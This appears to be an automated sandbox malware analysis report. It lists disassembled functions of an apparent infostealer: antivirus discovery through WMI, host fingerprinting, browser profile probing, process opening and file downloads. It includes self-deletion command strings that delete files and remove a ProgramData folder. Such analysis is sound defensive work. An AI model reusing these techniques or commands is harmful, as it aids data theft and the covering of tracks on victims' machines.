__EH_prolog3_catch.LIBCMT ref: 0041199E
CoInitializeEx.OLE32(00000000,00000000,00000030,00413F30,?,AV: ,004368BC,Install Date: ,004368A8,00000000,Windows: ,00436898,Work Dir: In memory,00436880), ref: 004119AD
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

VariantClear.OLEAUT32(?), ref: 00411A8B

Strings

Select * From AntiVirusProduct, xrefs: 00411A23
Unknown, xrefs: 00411AA0
displayName, xrefs: 00411A6F
Unknown, xrefs: 00411A99
root\SecurityCenter2, xrefs: 004119F0
Unknown, xrefs: 00411AB4
WQL, xrefs: 00411A28

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 4288110179-315474579
Opcode ID: c93ca1d2a6f897a9c4ae10426155f3377e266de60e586299c0be346b63fafe79
Instruction ID: cce6899aa7c627b92ffde1b41d91a0a32178603b6ed2f5158660ab44c27762d3
Opcode Fuzzy Hash: c93ca1d2a6f897a9c4ae10426155f3377e266de60e586299c0be346b63fafe79
Instruction Fuzzy Hash: E4314F70A40245BBCB20DB95DC49EEFBF7DEFC9B10F20461AF611A61A0C6B85941CB68

Function 00401284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004012A7
_memset.LIBCMT ref: 004012B6
lstrcatA.KERNEL32(?,0043A9E4), ref: 004012D0
lstrcatA.KERNEL32(?,0043A9E8), ref: 004012DE
lstrcatA.KERNEL32(?,0043A9EC), ref: 004012EC
lstrcatA.KERNEL32(?,0043A9F0), ref: 004012FA
lstrcatA.KERNEL32(?,0043A9F4), ref: 00401308
lstrcatA.KERNEL32(?,0043A9F8), ref: 00401316
lstrcatA.KERNEL32(?,0043A9FC), ref: 00401324
lstrcatA.KERNEL32(?,0043AA00), ref: 00401332
lstrcatA.KERNEL32(?,0043AA04), ref: 00401340
lstrcatA.KERNEL32(?,0043AA08), ref: 0040134E
lstrcatA.KERNEL32(?,0043AA0C), ref: 0040135C
lstrcatA.KERNEL32(?,0043AA10), ref: 0040136A
lstrcatA.KERNEL32(?,0043AA14), ref: 00401378

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

ExitProcess.KERNEL32 ref: 004013E3

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
String ID:
API String ID: 1553874529-0
Opcode ID: 7c09a38ce43d697918557ffdd3582b74198df045ee5b993886cbba539546cb7b
Instruction ID: bb02b9b61323cbd202445dbb3cf167c11530b26af8ff3a40cca1d967d1d15d49
Opcode Fuzzy Hash: 7c09a38ce43d697918557ffdd3582b74198df045ee5b993886cbba539546cb7b
Instruction Fuzzy Hash: C14185B2E4422C66DB20DB719C59FDB7BAC9F14350F5005A3E8D8E3181D67CDA88CB98

Function 0041823A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041825F
_memset.LIBCMT ref: 0041826E
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 00418283

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

ShellExecuteEx.SHELL32(?), ref: 0041841F
_memset.LIBCMT ref: 0041842E
_memset.LIBCMT ref: 00418440
ExitProcess.KERNEL32 ref: 00418450

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

" & exit, xrefs: 004183A3
" & rd /s /q "C:\ProgramData\, xrefs: 004182FC
" & exit, xrefs: 00418352
/c timeout /t 10 & del /f /q ", xrefs: 004182AE
/c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00418359

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
API String ID: 2823247455-1079830800
Opcode ID: 7b551fdd53861aa7b99f3137ecc587cd54ca6541074705811aa71ee93184293a
Instruction ID: 256a78b17c9948005ab358cac55532cee3df71b51ea82670ae7f250f6f357d14
Opcode Fuzzy Hash: 7b551fdd53861aa7b99f3137ecc587cd54ca6541074705811aa71ee93184293a
Instruction Fuzzy Hash: 9051ADB1D402299BCF21EF15CD41ADDB3BCAB44708F4110EAA718B7152DA786FC68F58

Function 004109A2 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
wsprintfA.USER32 ref: 00410AA7
lstrcatA.KERNEL32(00000000,00436E34), ref: 00410AB6

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436EC4,?,?,?,?,?), ref: 00411713

lstrlenA.KERNEL32(?), ref: 00410ACD

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Strings

C, xrefs: 004109DF
QuBi, xrefs: 00410A27
:\, xrefs: 00410A06
vA, xrefs: 00410B21

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
String ID: :\$C$QuBi$vA
API String ID: 1856320939-740167995
Opcode ID: 57fc16cf79857abcabd25f63ac927c3afb549af7b73d97481b79b6e1733cd2e7
Instruction ID: 3566b5b4d93052567d522c6fdc3d71b8ac85739c9aed76841ebb70e79ed6e19c
Opcode Fuzzy Hash: 57fc16cf79857abcabd25f63ac927c3afb549af7b73d97481b79b6e1733cd2e7
Instruction Fuzzy Hash: 2341A1B1A042289BCB249F749D85ADEBBB9EF19304F0000EAF109E3150E6758FD58F54

Function 0040EABC Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 290COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?), ref: 0040EAF9
StrCmpCA.SHLWAPI(?), ref: 0040EB56
StrCmpCA.SHLWAPI(?,firefox), ref: 0040EE1D
StrCmpCA.SHLWAPI(?), ref: 0040EC33

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004175EA), ref: 00410538

StrCmpCA.SHLWAPI(?), ref: 0040ECE3
StrCmpCA.SHLWAPI(?), ref: 0040ED40

Strings

YxA, xrefs: 0040ECD0, 0040EAE6
Stable\, xrefs: 0040EB71
Stable\, xrefs: 0040ED5B
firefox, xrefs: 0040EE17

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: Stable\$ Stable\$YxA$firefox
API String ID: 3722407311-1094127623
Opcode ID: 5638bd559bafc9974d2bea39a89f69e09fec74e87ae3bb074a22925992ba2f89
Instruction ID: 7b5a2934aedd5e45d524a5902c2414401f5f6fdffbf80b1274ea703f7d805636
Opcode Fuzzy Hash: 5638bd559bafc9974d2bea39a89f69e09fec74e87ae3bb074a22925992ba2f89
Instruction Fuzzy Hash: 52B1AF72D00109AFDF20FFA9DD47B8D77B2AF40318F550126F904B7291DA78AA588BD9

Function 00411203 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 155registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670B,00000000,?,?), ref: 00411273
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
wsprintfA.USER32 ref: 004112DD
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
lstrlenA.KERNEL32(?), ref: 00411347

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E84), ref: 004113DC

Strings

%s\%s, xrefs: 004112D7
?, xrefs: 00411263
- , xrefs: 004113E6

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
String ID: - $%s\%s$?
API String ID: 1736561257-3278919252
Opcode ID: 0e642b47d0107273f1a64af6442d8bb44133f3608e27ba63a7af9c1e2e3b1845
Instruction ID: 2908aff31a84832516e333fc715a0b61748632f0151a59db2ded1e8cda65474d
Opcode Fuzzy Hash: 0e642b47d0107273f1a64af6442d8bb44133f3608e27ba63a7af9c1e2e3b1845
Instruction Fuzzy Hash: 2C61E6B590022C9AEF21DB15DD84EDAB7B9AB44708F1042E6A608A2161DF35AFC9CF54

Function 0041688F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004175EA), ref: 00410538

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

StrCmpCA.SHLWAPI(?,ERROR), ref: 004168E3
lstrlenA.KERNEL32(?), ref: 004168EE

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,004168FA,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,?), ref: 00416903
lstrlenA.KERNEL32(?), ref: 00416912
lstrlenA.KERNEL32(00000000), ref: 0041692B

Strings

ERROR, xrefs: 00416936
ERROR, xrefs: 00416940
ERROR, xrefs: 004168DD
ERROR, xrefs: 00416947
ERROR, xrefs: 0041694E

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 4174444224-1526165396
Opcode ID: dfbf3886ec4841728c271aa9a6e5a892a20de8123031b9b75a4cfa945bea1401
Instruction ID: 9be3955ae02d8fa47908ba5e3f66db30d894a04ceac2f5e5034b80f355dae603
Opcode Fuzzy Hash: dfbf3886ec4841728c271aa9a6e5a892a20de8123031b9b75a4cfa945bea1401
Instruction Fuzzy Hash: DA21C471A00215ABCB20BB75DD469DD7BA5AF04314F11902BFD00F31A2DB7DD9858B99

Function 004067ED Relevance: 13.6, APIs: 9, Instructions: 110networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004175EA), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
StrCmpCA.SHLWAPI(?), ref: 00406856
InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
CloseHandle.KERNEL32(?), ref: 00406923
InternetCloseHandle.WININET(00000000), ref: 0040692A
InternetCloseHandle.WININET(?), ref: 00406936

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: ee1ac7cf7c28639bdb1e7b92f8f55fb0e407e0c60a852c8068ca8660cf06497f
Instruction ID: cbe824351fc4ccb66a21d1ceb878d1aedd75c8a2ce48e6de5e97826157353538
Opcode Fuzzy Hash: ee1ac7cf7c28639bdb1e7b92f8f55fb0e407e0c60a852c8068ca8660cf06497f
Instruction Fuzzy Hash: 62411DB1900128AFDF30DB21DD49BDA7BB9EF04315F1040B6FB09B21A1D6359E958FA8

Function 0040FB2D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
_memset.LIBCMT ref: 0040FBC1
??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17

Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A

Strings

N0ZWFt, xrefs: 0040FC7E

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenProcess_memmove_memset
String ID: N0ZWFt
API String ID: 2647191932-431618156
Opcode ID: 09c5f755c00d743d5ce0f62924fbf6a8c82eec07873bd999d867cc2c672c8a0a
Instruction ID: 0f266f934928723e0fcf9488acc14ad5b4b0daacd8b66a1f41e8e740426da83c
Opcode Fuzzy Hash: 09c5f755c00d743d5ce0f62924fbf6a8c82eec07873bd999d867cc2c672c8a0a
Instruction Fuzzy Hash: E45191B1D0022C9FDB309F54DC85BDDB7B9AB44308F0000FAA609B7692D6796E89CF59

Function 00407FAC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Strings

V@, xrefs: 00408042

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
